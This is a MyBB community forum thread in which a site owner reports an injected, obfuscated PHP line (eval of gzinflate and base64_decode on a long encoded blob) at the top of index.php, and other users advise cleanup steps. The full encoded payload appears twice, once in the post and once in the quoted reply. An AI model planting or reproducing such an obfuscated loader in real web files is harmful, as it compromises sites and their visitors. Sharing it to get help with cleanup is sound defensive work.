MyBB Community Forums

Full Version: Weird Code Top of Index.php
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
On the or about the 15 th my site was sending errors to my email so checked logs and did not notice any thing that popped out. but to day I noticed my site was slow and loading a lot of things I did not look like any thing i seen before.

So I went to the file verification and noticed index.php was red and I know I had not changed any thing on the index file.

but I found this code and have no Idea how it got there
<?php eval(gzinflate(base64_decode('7L0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8iivN063ctmiZvt36387a8c+cXpxdlNcnKFH8e4p/Pdg9/4+THfrdi9dnv9vu/Pn31k6evvvfxq9Mvvnxz+vsfP3366uPvH/5us9r77umXJ199cfrize//6ssv39C3eHmdpZ+lrsm337x5+ft/RX/9/sefU0sGMTn/jOCMP7778Xgxu781y9p86+PFeDa+/vjOHQZSURuAGWo1aotFvnVn++DT/Z0dfgWjOy/K/PfP3xVN22wxiDt3fs/1siyWb/VPabjVtPWqarZ+T25/kbe//7RatvkSb6HViAhwJ/3ss8/S86xs8ju/mN76sbyuq/r3r/NVVbfF8mKLer37LXzh4NHQRx9/t1jOqqvm4zu/62ef8evpL/yFadDii9dnp97XP/Mzqf/ts6LOz6t3ww2+XOV15r6+I+j92Koulu3WxQ+K5XkJSk2yJv90//ef5dNqRnR78Hzn27/Pk3ffKYuvFs/37v1e+b2Hv9fDr+rfe//br+cnZ08uTq/f/D5vT49/4sEXn5/9IM9eP3iyu3p1/cXqF13/oifXi5/87k/95O7i2dunXzz4qb2Dhw/vP3jw4N69e8vLy8vz/NMv7+9++Z275+d3f/Bw+lOLn3gyeTn58nVbf2dZfH78i5qL85f37h98+wcHxbd/+vzNuix2X+3tPrz7+6yfH3y6V/8+P72o6yb7QVav8vtfXO799OUPHl7+Pne/ePLu4cO795rzN1n9Uw+/ItifXP/09ac/+M7i8suX583bnezT8x/UX5V75eR85+4PmndfPL+7f/DTL+9/+uTpw+Xns9/77b13D767e/eLH6xmv/cnb36vu+vLL58fzO599/7r/PeePZisP/329Pe+3l9/unx9t/y99n+vB82D8x/sfTc/fzD5weTepPzB3le/9y+qdg4+Oa3f7T38ZP+nVicPvvypg8sf7E2/elt/cvdgv/nJ5cMvvpofz5a/13X9bv3y7rKqftD+9FVR3n34ye99f/ft7Hn+0+ufvvtg+uzu7/3lT53fe7Oc0YCaT+7NvnywfPIJje3+T81+6pPZt+89vXf3O893Ft9d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')));?>
So If it was done once it will probably happen again so what should I do to stop it
Re upload your index.php , change all your account passwords, cpanel, admin and admin link.
(2012-11-18, 07:02 AM)Howman Wrote: [ -> ]On the or about the 15 th my site was sending errors to my email so checked logs and did not notice any thing that popped out. but to day I noticed my site was slow and loading a lot of things I did not look like any thing i seen before.

So I went to the file verification and noticed index.php was red and I know I had not changed any thing on the index file.

but I found this code and have no Idea how it got there
<?php eval(gzinflate(base64_decode('7L0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8iivN063ctmiZvt36387a8c+cXpxdlNcnKFH8e4p/Pdg9/4+THfrdi9dnv9vu/Pn31k6evvvfxq9Mvvnxz+vsfP3366uPvH/5us9r77umXJ199cfrize//6ssv39C3eHmdpZ+lrsm337x5+ft/RX/9/sefU0sGMTn/jOCMP7778Xgxu781y9p86+PFeDa+/vjOHQZSURuAGWo1aotFvnVn++DT/Z0dfgWjOy/K/PfP3xVN22wxiDt3fs/1siyWb/VPabjVtPWqarZ+T25/kbe//7RatvkSb6HViAhwJ/3ss8/S86xs8ju/mN76sbyuq/r3r/NVVbfF8mKLer37LXzh4NHQRx9/t1jOqqvm4zu/62ef8evpL/yFadDii9dnp97XP/Mzqf/ts6LOz6t3ww2+XOV15r6+I+j92Koulu3WxQ+K5XkJSk2yJv90//ef5dNqRnR78Hzn27/Pk3ffKYuvFs/37v1e+b2Hv9fDr+rfe//br+cnZ08uTq/f/D5vT49/4sEXn5/9IM9eP3iyu3p1/cXqF13/oifXi5/87k/95O7i2dunXzz4qb2Dhw/vP3jw4N69e8vLy8vz/NMv7+9++Z275+d3f/Bw+lOLn3gyeTn58nVbf2dZfH78i5qL85f37h98+wcHxbd/+vzNuix2X+3tPrz7+6yfH3y6V/8+P72o6yb7QVav8vtfXO799OUPHl7+Pne/ePLu4cO795rzN1n9Uw+/ItifXP/09ac/+M7i8suX583bnezT8x/UX5V75eR85+4PmndfPL+7f/DTL+9/+uTpw+Xns9/77b13D767e/eLH6xmv/cnb36vu+vLL58fzO599/7r/PeePZisP/329Pe+3l9/unx9t/y99n+vB82D8x/sfTc/fzD5weTepPzB3le/9y+qdg4+Oa3f7T38ZP+nVicPvvypg8sf7E2/elt/cvdgv/nJ5cMvvpofz5a/13X9bv3y7rKqftD+9FVR3n34ye99f/ft7Hn+0+ufvvtg+uzu7/3lT53fe7Oc0YCaT+7NvnywfPIJje3+T81+6pPZt+89vXf3O893Ft9d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')));?>
So If it was done once it will probably happen again so what should I do to stop it

You have been hacked unfortunately. Also check your server space for any shell files or anything out of the ordinary that shouldn''t be there. And contact your host to check their access log as well so they can see how you got hacked and patch up the security hole.

P.s. What version of mybb are you using btw?
borbole
Well it is hosted on Windows server 2012 on my home computer
and I was using MyBB 1.68

Got some logs from IIS 8 But have no Idea what I am looking for

I have changed My passwords And I found that code again I am not sure on what to do to fix this.
Can Some one help?